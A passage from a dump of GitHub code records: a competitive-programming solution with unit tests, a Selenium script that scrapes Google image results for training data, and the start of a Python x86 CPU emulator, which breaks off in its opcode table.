integer')\n\n\n","repo_name":"aerialboundaries/python_practice","sub_path":"automate/chap3-collatz.py","file_name":"chap3-collatz.py","file_ext":"py","file_size_in_byte":393,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"34095231416","text":"# -*- coding: utf-8 -*-\r\n\r\nimport sys\r\nfrom io import StringIO\r\nimport unittest\r\nimport numpy as np\r\n\r\ndef resolve():\r\n # read data for n sequences.\r\n temp = sys.stdin.readline().split()\r\n N, M = np.asarray(temp).astype(int)\r\n temp = sys.stdin.readline().split()\r\n a = np.asarray(temp).astype(int)\r\n \r\n sumvotes = np.sum(a)\r\n \r\n c = 0; OUT = False\r\n for data in a:\r\n if data >= sumvotes/(4*M):\r\n c += 1\r\n if c >= M:\r\n OUT = True\r\n #break\r\n \r\n if OUT:\r\n print(\"Yes\")\r\n else:\r\n print(\"No\")\r\n \r\n\r\nclass TestClass(unittest.TestCase):\r\n def assertIO(self, input, output):\r\n stdout, stdin = sys.stdout, sys.stdin\r\n sys.stdout, sys.stdin = StringIO(), StringIO(input)\r\n resolve()\r\n sys.stdout.seek(0)\r\n out = sys.stdout.read()[:-1]\r\n sys.stdout, sys.stdin = stdout, stdin\r\n self.assertEqual(out, output)\r\n def test_入力例_1(self):\r\n input = \"\"\"4 1\r\n5 4 2 1\"\"\"\r\n output = \"\"\"Yes\"\"\"\r\n self.assertIO(input, output)\r\n def test_入力例_2(self):\r\n input = \"\"\"3 2\r\n380 19 1\"\"\"\r\n output = \"\"\"No\"\"\"\r\n self.assertIO(input, output)\r\n def test_入力例_3(self):\r\n input = \"\"\"12 3\r\n4 56 78 901 2 345 67 890 123 45 6 789\"\"\"\r\n output = \"\"\"Yes\"\"\"\r\n self.assertIO(input, output)\r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n \r\n unittest.main()","repo_name":"kentaroy47/atcoder","sub_path":"abc161/b.py","file_name":"b.py","file_ext":"py","file_size_in_byte":1452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"14139600920","text":"import time\nimport requests\nimport urllib.request\nimport cv2\nimport numpy as np\nimport os\n \nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\n\noptions = webdriver.ChromeOptions()\noptions.add_argument('headless')\noptions.add_argument('window-size=1920x1080')\noptions.add_argument(\"disable-gpu\")\nbrowser = webdriver.Chrome('D:\\Python\\driver\\chromedriver_win32\\chromedriver.exe', chrome_options=options)\n\ndef neg_img(word):\n url = 'https://www.google.co.kr/search?q=' + word + '&tbm=isch'\n browser.get(url)\n elem = browser.find_element_by_tag_name(\"body\") \n\n no = 5\n while no:\n elem.send_keys(Keys.PAGE_DOWN)\n time.sleep(0.3)\n no -= 1\n \n cnt = 1\n img_list = list()\n img = browser.find_elements_by_class_name(\"rg_ic\")\n\n for i in img:\n img_list.append(i.get_attribute(\"src\"))\n\n for i in img_list:\n try:\n print(i)\n urllib.request.urlretrieve(i, \"act/\" + str(cnt) + \".jpg\")\n # img = cv2.imread(\"act/\" + str(cnt) + \".jpg\", cv2.IMREAD_GRAYSCALE)\n # resized_image = cv2.resize(img, (100, 100))\n # cv2.imwrite(\"act/\"+str(cnt)+\".jpg\", img)\n cnt += 1\n except Exception as e:\n print(str(e))\n\ndef pos_img():\n url = 'https://www.google.co.kr/search?q=남자+배우&tbm=isch'\n browser.get(url)\n elem = browser.find_element_by_tag_name(\"body\") \n \n no = 4\n while no:\n elem.send_keys(Keys.PAGE_DOWN)\n time.sleep(0.3)\n no -= 1\n\n cnt = 1\n img_list = list()\n img = browser.find_elements_by_class_name(\"rg_ic\")\n\n for i in img:\n img_list.append(i.get_attribute(\"src\"))\n\n for i in img_list:\n try:\n print(i)\n urllib.request.urlretrieve(i, \"pos/\" + str(cnt) + \".jpg\")\n img = cv2.imread(\"pos/\" + str(cnt) + \".jpg\", cv2.IMREAD_GRAYSCALE)\n # resized_image = cv2.resize(img, (100, 100))\n cv2.imwrite(\"pos/\"+str(cnt)+\".jpg\", img)\n cnt += 1\n except Exception as e:\n print(str(e))\n\ndef create_pos_n_neg():\n for file_type in ['neg', 'pos']:\n for img in os.listdir(file_type):\n if file_type == 'pos':\n line = file_type + '/' + img + '\\n'\n with open('positives.txt', 'a') as f:\n f.write(line)\n elif file_type == 'neg':\n line = file_type+'/'+img+'\\n'\n with open('negatives.txt', 'a') as f:\n f.write(line)\n","repo_name":"bobbohee/gui-img-crawling","sub_path":"img_crawling.py","file_name":"img_crawling.py","file_ext":"py","file_size_in_byte":2287,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"38669751269","text":"# coding: utf-8\nimport os\nimport sys\nimport copy\n#import register\n\n\nclass memory():\n def __init__(self,k64): # mem=64k*64\n '''\n if 64KB : k64 = 1\n if 640KB : k64 = 10\n if 1MB : k64 = 16\n if 1GB : k64 = 16384\n '''\n self.segment=65536\n memorysize = self.segment*k64\n self._memory = [0 for i in range(0,memorysize)]\n self.memmax = memorysize-1 #final address\n print('memmax={0}'.format(self.memmax))\n\n def set(self,addr,v):\n self._memory[addr] = v & 0xff\n\n def get(self,addr):\n return self._memory[addr]\n\n\nclass cpu():\n def msg(str):\n print(str)\n pass\n\n def dbgp(str):\n #print(str)\n pass\n\n # define register label\n rax_=0\n eax_=1\n ax_=2\n ah_=3\n al_=4\n\n rcx_=5\n ecx_=6\n cx_=7\n ch_=8\n cl_=9\n\n rdx_=10\n edx_=11\n dx_=12\n dh_=13\n dl_=14\n\n rbx_=15\n ebx_=16\n bx_=17\n bh_=18\n bl_=19\n\n rsp_=20\n esp_=21\n sp_=22\n spl_=23\n\n rbp_=24\n ebp_=25\n bp_=26\n bpl_=27\n\n rsi_=28\n esi_=29\n si_=30\n sil_=31\n\n rdi_=32\n edi_=33\n di_=34\n dil_=35\n\n mm0_=36\n mm1_=37\n mm2_=38\n mm3_=39\n mm4_=40\n mm5_=41\n mm6_=42\n mm7_=43\n\n xmm0_=44\n xmm1_=45\n xmm2_=46\n xmm3_=47\n xmm4_=48\n xmm5_=49\n xmm6_=50\n xmm7_=51\n xmm8_=52\n xmm9_=53\n xmm10_=54\n xmm11_=55\n xmm12_=56\n xmm13_=57\n xmm14_=58\n xmm15_=59\n\n r8_=60\n r8d_=61\n r8w_=62\n r8b_=63\n\n r9_=64\n r9d_=65\n r9w_=66\n r9b_=67\n\n r10_=68\n r10d_=69\n r10w_=70\n r10b_=71\n\n r11_=72\n r11d_=73\n r11w_=74\n r11b_=75\n\n r12_=76\n r12d_=77\n r12w_=78\n r12b_=79\n\n r13_=80\n r13d_=81\n r13w_=82\n r13b_=83\n\n r14_=84\n r14d_=85\n r14w_=86\n r14b_=87\n\n r15_=88\n r15d_=89\n r15w_=90\n r15b_=91\n\n es_=92\n cs_=93\n ss_=94\n ds_=95\n fs_=96\n gs_=97\n\n cr0_=98\n cr1_=99 #invd\n cr2_=100\n cr3_=101\n cr4_=102\n cr5_=103 #invd\n cr6_=104 #invd\n cr7_=105 #invd\n cr8_=106\n\n dr0_=107\n dr1_=108\n dr2_=109\n dr3_=110\n dr4_=111\n dr5_=112\n dr6_=113\n dr7_=114\n INVD=115\n RESERVED=116\n NREG=115\n\n r_rax=0\n r_rcx=1\n r_rdx=2\n r_rbx=3\n r_rsp=4\n r_rbp=5\n r_rsi=6\n r_rdi=7\n\n r_mm0=8\n r_mm1=9\n r_mm2=10\n r_mm3=11\n r_mm4=12\n r_mm5=13\n r_mm6=14\n r_mm7=15\n\n r_xmm0=16\n r_xmm1=17\n r_xmm2=18\n r_xmm3=19\n r_xmm4=20\n r_xmm5=21\n r_xmm6=22\n r_xmm7=23\n r_xmm8=24\n r_xmm9=25\n r_xmm10=26\n r_xmm11=27\n r_xmm12=28\n r_xmm13=29\n r_xmm14=30\n r_xmm15=31\n\n r_r8=32\n r_r9=33\n r_r10=34\n r_r11=35\n r_r12=36\n r_r13=37\n r_r14=38\n r_r15=39\n\n r_es=40\n r_cs=41\n r_ss=42\n r_ds=43\n r_fs=44\n r_gs=45\n\n r_cr0=46\n r_cr1=47 #invd\n r_cr2=48\n r_cr3=49\n r_cr4=50\n r_cr5=51 #invd\n r_cr6=52 #invd\n r_cr7=53 #invd\n r_cr8=54\n\n r_dr0=55\n r_dr1=56\n r_dr2=57\n r_dr3=58\n r_dr4=59\n r_dr5=60\n r_dr6=61\n r_dr7=62\n\n r_INDV=63\n r_RESERVED=64\n r_NREG=63\n\n # resource type\n RTr8=0 # AL\n RTrH=1 # AH\n RTr16=2 # AX\n RTr32=3 # EAX\n RTr64=4 # RAX\n RTr128=6 # XMM\n\n regp=[\n # realreg , rtype , name\n [r_rax, RTr64,'rax_'], #0 rax\n [r_rax, RTr32,'eax_'],\n [r_rax, RTr16,'ax_'],\n [r_rax, RTrH ,'ah_'],\n [r_rax, RTr8 ,'al_'],\n [r_rcx, RTr64,'rcx_'], #5 rcx\n [r_rcx, RTr32,'ecx_'],\n [r_rcx, RTr16,'cx_'],\n [r_rcx, RTrH ,'ch_'],\n [r_rcx, RTr8 ,'cl_'],\n [r_rdx, RTr64,'rdx_'], #10 rdx\n [r_rdx, RTr32,'edx_'],\n [r_rdx, RTr16,'dx_'],\n [r_rdx, RTrH ,'dh_'],\n [r_rdx, RTr8 ,'dl_'],\n [r_rbx, RTr64,'rbx_'], #15 rbx\n [r_rbx, RTr32,'ebx_'],\n [r_rbx, RTr16,'bx_'],\n [r_rbx, RTrH ,'bh_'],\n [r_rbx, RTr8 ,'bl_'],\n [r_rsp, RTr64,'rsp_'], #20 rsp\n [r_rsp, RTr32,'esp_'],\n [r_rsp, RTr16,'sp_'],\n [r_rsp, RTr8 ,'spl_'],\n [r_rbp, RTr64,'rbp_'], #24 rbp\n [r_rbp, RTr32,'ebp_'],\n [r_rbp, RTr16,'bp_'],\n [r_rbp, RTr8 ,'bpl_'],\n [r_rsi, RTr64,'rsi_'], #28 rsi\n [r_rsi, RTr32,'esi_'],\n [r_rsi, RTr16,'si_'],\n [r_rsi, RTr8 ,'sil_'],\n [r_rdi, RTr64,'rdi_'], #32 rdi\n [r_rdi, RTr32,'edi_'],\n [r_rdi, RTr16,'di_'],\n [r_rdi, RTr8 ,'dil_'],\n [r_mm0, RTr64,'mm0_'], #36 mm0\n [r_mm1, RTr64,'mm1_'],\n [r_mm2, RTr64,'mm2_'],\n [r_mm3, RTr64,'mm3_'],\n [r_mm4, RTr64,'mm4_'],\n [r_mm5, RTr64,'mm5_'],\n [r_mm6, RTr64,'mm6_'],\n [r_mm7, RTr64,'mm7_'],\n [r_xmm0,RTr128,'xmm0_'], #44 xmm0\n [r_xmm1,RTr128,'xmm1_'],\n [r_xmm2,RTr128,'xmm2_'],\n [r_xmm3,RTr128,'xmm3_'],\n [r_xmm4,RTr128,'xmm4_'],\n [r_xmm5,RTr128,'xmm5_'],\n [r_xmm6,RTr128,'xmm6_'],\n [r_xmm7,RTr128,'xmm7_'],\n [r_xmm8,RTr128,'xmm8_'],\n [r_xmm9,RTr128,'xmm9_'],\n [r_xmm10,RTr128,'xmm10_'],\n [r_xmm11,RTr128,'xmm11_'],\n [r_xmm12,RTr128,'xmm12_'],\n [r_xmm13,RTr128,'xmm13_'],\n [r_xmm14,RTr128,'xmm14_'],\n [r_xmm15,RTr128,'xmm15_'],\n [r_r8 , RTr64 ,'r8_'], #60 r8\n [r_r8 , RTr32 ,'r8d_'],\n [r_r8 , RTr16 ,'r8w_'],\n [r_r8 , RTr8 ,'[r8b_'],\n [r_r9 , RTr64 ,'r9_'], #64 r9\n [r_r9 , RTr32 ,'r9d_'],\n [r_r9 , RTr16 ,'r9w_'],\n [r_r9 , RTr8 ,'r9b_'],\n [r_r10, RTr64 ,'r10_'], #68 r10\n [r_r10, RTr32 ,'r10d_'],\n [r_r10, RTr16 ,'r10w_'],\n [r_r10, RTr8 ,'r10b_'],\n [r_r11, RTr64 ,'r11_'], #72 r11\n [r_r11, RTr32 ,'r11d_'],\n [r_r11, RTr16 ,'r11w_'],\n [r_r11, RTr8 ,'r11b_'],\n [r_r12, RTr64 ,'r12_'], #76 r12\n [r_r12, RTr32 ,'r12d_'],\n [r_r12, RTr16 ,'r12w_'],\n [r_r12, RTr8 ,'r12b_'],\n [r_r13, RTr64 ,'r13_'], #80 r13\n [r_r13, RTr32 ,'r13d_'],\n [r_r13, RTr16 ,'r13w_'],\n [r_r13, RTr8 ,'r13b_'],\n [r_r14, RTr64 ,'r14_'], #84 r14\n [r_r14, RTr32 ,'r14d_'],\n [r_r14, RTr16 ,'r14w_'],\n [r_r14, RTr8 ,'r14b_'],\n [r_r15, RTr64 ,'r15_'], #88 r15\n [r_r15, RTr32 ,'r15d_'],\n [r_r15, RTr16 ,'r15w_'],\n [r_r15, RTr8 ,'r15b_'],\n [r_es , RTr16 ,'es_'], #92 es\n [r_cs , RTr16 ,'cs_'], #93\n [r_ss , RTr16 ,'ss_'], #94\n [r_ds , RTr16 ,'ds_'], #95\n [r_fs , RTr16 ,'fs_'], #96\n [r_gs , RTr16 ,'gs_'], #97\n [r_cr0 , RTr32 ,'cr0_'],\n [r_cr1 , RTr32 ,'cr1_'], #invd\n [r_cr2 , RTr32 ,'cr2_'],\n [r_cr3 , RTr32 ,'cr3_'],\n [r_cr4 , RTr32 ,'cr4_'],\n [r_cr5 , RTr32 ,'cr5_'], #invd\n [r_cr6 , RTr32 ,'cr6_'], #invd\n [r_cr7 , RTr32 ,'cr7_'], #invd\n [r_cr8 , RTr32 ,'cr8_'],\n [r_dr0 , RTr32 ,'dr0_'],\n [r_dr1 , RTr32 ,'dr1_'],\n [r_dr2 , RTr32 ,'dr2_'],\n [r_dr3 , RTr32 ,'dr3_'],\n [r_dr4 , RTr32 ,'dr4_'],\n [r_dr5 , RTr32 ,'dr5_'],\n [r_dr6 , RTr32 ,'dr6_'],\n [r_dr7 , RTr32 ,'dr7_']\n ]\n\n r2reg=[0 for x in range(0, r_NREG)]\n x=0\n for y in range(0, NREG):\n if regp[y][0] != x:\n x += 1\n r2reg[x] = y\n\n mod1164 = [\n [ # rex.b = 0\n [ # rax\n al_,None,\n ax_ ,\n eax_ ,\n rax_ ,\n mm0_ ,\n xmm0_ ,\n es_ ,\n cr0_ ,\n dr0_\n ] ,\n [ # rcx\n cl_ , None,\n cx_ ,\n ecx_ ,\n rcx_ ,\n mm1_ ,\n xmm1_ ,\n cs_ ,\n INVD ,\n dr1_\n ] ,\n [ # rdx_\n dl_ , None,\n dx_ ,\n edx_ ,\n rdx_ ,\n mm2_ ,\n xmm2_ ,\n ss_ ,\n cr2_ ,\n dr2_\n ] ,\n [ # rbx_\n bl_ , None,\n bx_ ,\n ebx_ ,\n rbx_ ,\n mm3_ ,\n xmm3_ ,\n ds_ ,\n cr3_ ,\n dr3_\n ] ,\n [ # rsp_\n spl_ , None, #@16 ah_\n sp_ ,\n esp_ ,\n rsp_ ,\n mm4_ ,\n xmm4_ ,\n fs_ ,\n cr4_ ,\n dr4_\n ] ,\n [ # rbp_\n bpl_ , None, #@16 ch_\n bp_ ,\n ebp_ ,\n rbp_ ,\n mm5_ ,\n xmm5_ ,\n gs_ ,\n INVD ,\n dr5_\n ] ,\n [ # rsi_\n sil_ , None, #@16 dh_\n si_ ,\n esi_ ,\n rsi_ ,\n mm6_ ,\n xmm6_ ,\n RESERVED ,\n INVD ,\n dr6_\n ] ,\n [ # rdi_\n dil_ , None, #@16 bh_\n di_ ,\n edi_ ,\n rdi_ ,\n mm7_ ,\n xmm7_ ,\n RESERVED ,\n INVD ,\n dr7_\n ]\n ] ,\n [ # rex.b = 1\n [ # r8\n r8b_, None,\n r8w_ ,\n r8d_ ,\n r8_ ,\n mm0_ ,\n xmm8_ ,\n es_ ,\n cr8_ ,\n INVD\n ] ,\n [ # r9\n r9b_ , None,\n r9w_ ,\n r9d_ ,\n r9_ ,\n mm1_ ,\n xmm9_ ,\n cs_ ,\n INVD ,\n INVD\n ] ,\n [ # r10_\n r10b_ , None,\n r10w_ ,\n r10d_ ,\n r10_ ,\n mm2_ ,\n xmm10_ ,\n ss_ ,\n INVD ,\n INVD\n ] ,\n [ # r11\n r11b_ , None,\n r11w_ ,\n r11d_ ,\n r11_ ,\n mm3_ ,\n xmm11_ ,\n ds_ ,\n INVD ,\n INVD\n ] ,\n [ # r12_\n r12b_ , None,\n r12w_ ,\n r12d_ ,\n r12_ ,\n mm4_ ,\n xmm12_ ,\n fs_ ,\n INVD ,\n INVD\n ] ,\n [ # r13\n r13b_ , None,\n r13w_ ,\n r13d_ ,\n r13_ ,\n mm5_ ,\n xmm13_ ,\n gs_ ,\n INVD ,\n INVD\n ] ,\n [ # r14\n r14b_ , None,\n r14w_ ,\n r14d_ ,\n r14_ ,\n mm6_ ,\n xmm14_ ,\n RESERVED ,\n INVD ,\n INVD ,\n ] ,\n [ # r15\n r15b_ , None,\n r15w_ ,\n r15d_ ,\n r15_ ,\n mm7_ ,\n xmm15_ ,\n RESERVED ,\n INVD ,\n INVD ,\n ]\n ]\n ]\n\n mod1116 = copy.deepcopy(mod1164)\n mod1116[0][r_rsp][RTr8] = ah_\n mod1116[0][r_rbp][RTr8] = ch_\n mod1116[0][r_rsi][RTr8] = dh_\n mod1116[0][r_rdi][RTr8] = bh_\n\n ID=2**21 #Identification Flag\n VIP=2**20 #Virtual Interrupt Pending\n VIF=2**19 #Virtual Interrupt\n AC=2**18 #Alignment check\n VM=2**17 #Virtual8086 mode\n RF=2**16 #Resume Flag\n NT=2**14 #Nested Task\n IOPL13=2**13 #I/O Privillege Level\n IOPL12=2**12\n OF=2**11 #status:overflow\n DF=2**10 #control:direction\n IF=2**9 #control:interrupt\n TF=2**8 #control:trap\n SF=2**7 #status:sign\n ZF=2**6 #status:zero\n AF=2**4 #status:auxiliary carry\n PF=2**2 #statis:parity\n CF=2**0 #status:carry\n\n maskRG=0b00111000\n shftG=3\n maskRM=0b00000111\n maskMB=0b11000000\n shftM=6\n\n mask=[\n 0x00000000000000FF , #RTr8\n 0x00000000000000FF , #RTrH\n 0x000000000000FFFF , #RTr16\n 0x00000000FFFFFFFF , #RTr32\n 0xFFFFFFFFFFFFFFFF , #RTr64\n 0xFFFFFFFFFFFFFFFF , #RTr64\n 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF #RTr128\n ]\n\n maskRead=[\n 0x00000000000000FF , #RTr8\n 0x000000000000FF00 , #RTrH\n 0x000000000000FFFF , #RTr16\n 0x00000000FFFFFFFF , #RTr32\n 0xFFFFFFFFFFFFFFFF , #RTr64\n 0xFFFFFFFFFFFFFFFF , #RTr64\n 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF #RTr128\n ]\n\n maskL=[\n mask[RTr128]^mask[RTr8], #RTr8\n mask[RTr128]^mask[RTrH], #RTrH\n mask[RTr128]^mask[RTr16],#RTr16\n mask[RTr128]^mask[RTr32],#RTr32\n mask[RTr128]^mask[RTr64],#RTr64\n mask[RTr128]^mask[RTr64],\n 0x0 #RTr128\n ]\n\n maskAL=maskRead[RTr8]\n maskAH=maskRead[RTrH]\n\n maskMSB=[\n 1<<7, #RTr8\n 1<<7, #RTrH treated as rtr8\n 1<<15,#RTr16\n 1<<31,#RTr32\n 1<<63,#RTr64\n 1<<63,\n 1<<127 #RTr128\n ]\n\n maskMSBR=[\n mask[RTr8] - maskMSB[RTr8],\n mask[RTr8] - maskMSB[RTr8], # attention\n mask[RTr16] - maskMSB[RTr16],\n mask[RTr32] - maskMSB[RTr32],\n mask[RTr64] - maskMSB[RTr64],\n mask[RTr64] - maskMSB[RTr64],\n mask[RTr128]- maskMSB[RTr128]\n ]\n\n r8=0\n rH=1\n r16=2\n r32=3\n r64=4\n mm=5\n xmm=6\n sreg=7\n eee0=8\n eee1=9\n\n bits = [\n 8, #r8\n 8, #rH\n 16, #r16\n 32, #r32\n 64, #r64\n 64, #r64 mm\n 128, #r128 xmm\n 16, #r16 segment register\n 32, #r32 control register\n 32 #r32 debug register\n ]\n\n REX = [\n 0x0 , #REX\n 0x1 , #REX.B\n 0x2 , #REX.X\n 0x3 , #REX.XB\n 0x4 , #REX.R\n 0x5 , #REX.RB\n 0x6 , #REX.RX\n 0x7 , #REX.RXB\n 0x8 , #REX.W\n 0x9 , #REX.WB\n 0xA , #REX.WX\n 0xB , #REX.WXB\n 0xC , #REX.WR\n 0xD , #REX.WRB\n 0xE , #REX.WRX\n 0xF #REX.WRXB\n ]\n\n REXb=1\n REXx=2\n REXr=4\n REXw=8\n\n modeREAL = 0 #0 real mode\n modeIA32 = 1 #1 IA32 mode(protedted)\n modeV8086 = 2 #2 V8086 mode\n modeIA32e = 3 #3 IA32e mode(64bit)\n\n stacksize = [\n 1 , # cpu.RTr8\n 1 , # cpu.RTrH\n 2 , # cpu.RTr16\n 4 , # cpu.RTr32\n 8 # cpu.RTr64\n ]\n\n LOGIC = 1 #Logical\n ARITH = 0 #Arithmetic\n\n\n\n def rReg(self,reg):\n r = cpu.regp[reg][0]\n rt= cpu.regp[reg][1]\n rv = self.register[r] & cpu.maskRead[rt]\n if rt == cpu.RTrH :\n rv >>= 8\n return rv\n\n\n def wReg(self,reg,val):\n r = cpu.regp[reg][0]\n rt= cpu.regp[reg][1]\n dmask = cpu.maskRead[rt]\n maskL = cpu.maskRead[cpu.RTr128] ^ dmask\n old = self.register[r]\n\n if rt == cpu.RTrH:\n val <<= 8\n #print(hex(val))\n\n old &= maskL\n val &= dmask\n self.register[r] = old | val\n return self.register[r]\n\n def disp(self,rt): #displacement\n r=0\n c=0\n bits = cpu.bits[rt]\n while bits > 0:\n r += self.readNextMem(self.CS) << (cpu.bits[cpu.RTr8]*c)\n c += 1\n bits -= 8\n return r\n\n\n def wMem(self,addr,v,rt,seg):\n c=0\n bits = int(cpu.bits[rt]>>3) #Division by 8 = bits2bytes\n while bits > c:\n bt = v & 0xff #lowest 1 byte\n self.mem.set(addr + (seg<<4), bt)\n s='wMem [0x{2:04X}:0x{0:04X}]:0x{1:02X}'.format(addr, bt, seg)\n\n cpu.dbgp(s)\n v >>= 8\n c += 1\n addr += 1\n\n\n\n def rMem(self,addr,rt,seg):\n r=0\n c=0\n bits = int(cpu.bits[rt]>>3) #Division by 8 -> bits2bytes\n while bits > c:\n bt = self.mem.get(addr + (seg<<4))\n r += bt << (8*c)\n s='rMem [0x{2:04X}:0x{0:04X}]:0x{1:02X}'.format(addr, bt, seg)\n #s='c={0} r={1:X}'.format(c, r)\n cpu.dbgp(s)\n c += 1\n addr += 1\n return r\n\n\n def initReg(self):\n self.wReg(cpu.cs_ , 0)\n self.wReg(cpu.ds_ , 0)\n self.wReg(cpu.es_ , 0)\n self.wReg(cpu.fs_ , 0)\n self.wReg(cpu.gs_ , 0)\n\n #self.SS = self.mem.memmax - (self.mem.segment - 1)\n self.SS = 0\n\n self.wReg(cpu.ss_ , self.SS)\n\n #rsp = self.SS + self.mem.segment - 1\n rsp = self.mem.segment - 1\n self.wReg(cpu.rsp_ , rsp)\n #cpu.dbgp('seg:{0} reg:{1}'.format(self.mem.segment , self.rReg(cpu.rsp_)))\n\n\n def __init__(self,memory):\n self.eip=0\n self.eflags=0\n self.mem=memory\n self.register = [0 for x in range(0,cpu.r_NREG)]\n\n self.SS = 0 # stack segment\n self.CS = 0 # code segment\n self.DS = 0 # data segment\n self.ES = 0 # extra segment\n self.seg = 0 # Overrided segment value\n self.override = False\n\n\n self.Mod=0 # ModRM's Mod\n self.Mrm=0 # ModRM's RM\n self.rm=0 # rm pointer\n self.Mro=0 # ModRM's reg/op\n self.ro=0 # r/o value\n\n\n self.defaultDB = cpu.RTr16\n self.DB = cpu.RTr16\n #16bit = cpu.RTr16\n #32bit = cpu.RTr32\n #64bit = cpu.RTr64\n\n\n self.cpumode = cpu.modeREAL\n #0 REAL mode\n #1 IA32 mode(protedted)\n #2 V8086 mode\n #3 IA32e mode(64bit)\n\n self.rexw = self.rexr = self.rexx = self.rexb = 0\n\n self.dstO=self.dstV=0\n self.srcO=self.srcV=0\n self.drm=0\n self.dRT=self.sRT=0\n # dstO = dest Operand\n # dstV = value of dest\n # dRT = resource type of dest\n # drm = dest type, register or memory(its meaning is same as Mod)\n # srvO = src Operand\n # srcV = value of src\n # sRT = resource type of src\n\n self.opStr = ''\n self._scf = 0 # temporary ShiftCarry\n self._ccf = 0 # temporary CompletionCarry\n self.displaytext=''\n\n self.ftbl16=[\n # [modbit][rg or rm]\n # modbit 0b00\n [\n lambda : self.rReg(cpu.bx_) + self.rReg(cpu.si_) , #000\n lambda : self.rReg(cpu.bx_) + self.rReg(cpu.di_) , #001\n lambda : self.rReg(cpu.bp_) + self.rReg(cpu.si_) , #010\n lambda : self.rReg(cpu.bp_) + self.rReg(cpu.di_) , #011\n lambda : self.rReg(cpu.si_) , #100\n lambda : self.rReg(cpu.di_) , #101\n lambda : self.disp(cpu.RTr16) , #110\n lambda : self.rReg(cpu.bx_) #111\n ],\n\n # modbit 0b01. disp8 series\n [\n lambda : self.rReg(cpu.bx_) + self.rReg(cpu.si_) + self.disp(cpu.RTr8) , #000\n lambda : self.rReg(cpu.bx_) + self.rReg(cpu.di_) + self.disp(cpu.RTr8) , #001\n lambda : self.rReg(cpu.bp_) + self.rReg(cpu.si_) + self.disp(cpu.RTr8) , #010\n lambda : self.rReg(cpu.bp_) + self.rReg(cpu.di_) + self.disp(cpu.RTr8) , #011\n lambda : self.rReg(cpu.si_) + self.disp(cpu.RTr8) , #100\n lambda : self.rReg(cpu.di_)+ self.disp(cpu.RTr8) , #101\n lambda : self.rReg(cpu.bp_)+ self.disp(cpu.RTr8) , #110\n lambda : self.rReg(cpu.bx_)+ self.disp(cpu.RTr8) , #111\n ],\n\n # modbit 0b10 disp16 series\n [\n lambda : self.rReg(cpu.bx_) + self.rReg(cpu.si_) + self.disp(cpu.RTr16) , #000\n lambda : self.rReg(cpu.bx_) + self.rReg(cpu.di_) + self.disp(cpu.RTr16) , #001\n lambda : self.rReg(cpu.bp_) + self.rReg(cpu.si_) + self.disp(cpu.RTr16) , #010\n lambda : self.rReg(cpu.bp_) + self.rReg(cpu.di_) + self.disp(cpu.RTr16) , #011\n lambda : self.rReg(cpu.si_) + self.disp(cpu.RTr16) , #100\n lambda : self.rReg(cpu.di_) + self.disp(cpu.RTr16) , #101\n lambda : self.rReg(cpu.bp_) + self.disp(cpu.RTr16) , #110\n lambda : self.rReg(cpu.bx_) + self.disp(cpu.RTr16) #111\n ]\n ]\n\n self.rf=[ #mod=0,1,2,3\n lambda d,dR,seg: self.rMem(d,dR,seg) ,\n lambda d,dR,seg : self.rMem(d,dR,seg) ,\n lambda d,dR,seg : self.rMem(d,dR,seg) ,\n lambda d,dR,seg : self.rReg(d)\n ]\n\n self.wf=[ #mod=0,1,2,3\n lambda d,v,dR,seg: self.wMem(d,v,dR,seg),\n lambda d,v,dR,seg: self.wMem(d,v,dR,seg),\n lambda d,v,dR,seg: self.wMem(d,v,dR,seg),\n lambda d,v,dR,seg: self.wReg(d,v)\n ]\n\n self.modstr=[ #mod 0,1,2,3\n lambda x : \"M[{0}]\".format(x),\n lambda x : \"M[{0}]\".format(x),\n lambda x : \"M[{0}]\".format(x),\n lambda x : \"R[{0}]\".format(cpu.regp[x][2])\n ]\n\n self.opcode = [\n lambda x : self.op_add(\n self.Mrmyrx, cpu.RTr8, cpu.RTr8),#00\n lambda x : self.op_add(\n self.Mrmyrx, self.DB, self.DB),#01\n lambda x : self.op_add(\n self.Mrxrmy, cpu.RTr8, cpu.RTr8),#02\n lambda x : self.op_add(\n self.Mrxrmy, self.DB, self.DB),#03\n lambda x : self.op_add(\n self.Srxiz, cpu.al_, cpu.RTr8),#04\n lambda x : self.op_add(\n self.Srxiz, cpu.rax_, self.DB),#05\n lambda x : self.op_push(\n self.Srx, cpu.es_, 0),#06 #16bit\n lambda x : self.op_pop(\n self.Srx, cpu.es_, 0),#07 #16bit\n\n\n lambda x : self.op_or(\n self.Mrmyrx, cpu.RTr8, cpu.RTr8),#08\n lambda x : self.op_or(\n self.Mrmyrx, self.DB, self.DB),#09\n lambda x : self.op_or(\n self.Mrxrmy, cpu.RTr8, cpu.RTr8),#0A\n lambda x : self.op_or(\n self.Mrxrmy, self.DB, self.DB),#0B\n lambda x : self.op_or(\n self.Srxiz, cpu.al_, cpu.RTr8),#0C\n lambda x : self.op_or(\n self.Srxiz, cpu.rax_, self.DB),#0D\n lambda x : self.op_push(\n self.Srx, cpu.cs_, 0),#0E #16bit\n lambda x : self.op_(x),\n #self.Srx, cpu.es_, 0),#0F\n\n lambda x : self.op_adc(\n self.Mrmyrx, cpu.RTr8, cpu.RTr8),#10\n lambda x : self.op_adc(\n self.Mrmyrx, self.DB, self.DB),#11\n lambda x : self.op_adc(\n self.Mrxrmy, cpu.RTr8, cpu.RTr8),#12\n lambda x : self.op_adc(\n self.Mrxrmy, self.DB, self.DB),#13\n lambda x : self.op_adc(\n self.Srxiz, cpu.al_, cpu.RTr8),#14\n lambda x : self.op_adc(\n self.Srxiz, cpu.rax_, self.DB),#15\n lambda x : self.op_push(\n self.Srx, cpu.ss_, 0),#16 #16bit\n lambda x : self.op_pop(\n self.Srx, cpu.ss_, 0),#17 #16bit\n\n lambda x : self.op_sbb(\n self.Mrmyrx, cpu.RTr8, cpu.RTr8),#18\n lambda x : self.op_sbb(\n self.Mrmyrx, self.DB, self.DB),#19\n lambda x : self.op_sbb(\n self.Mrxrmy, cpu.RTr8, cpu.RTr8),#1A\n lambda x : self.op_sbb(\n self.Mrxrmy, self.DB, self.DB),#1B\n lambda x : self.op_sbb(\n self.Srxiz, cpu.al_, 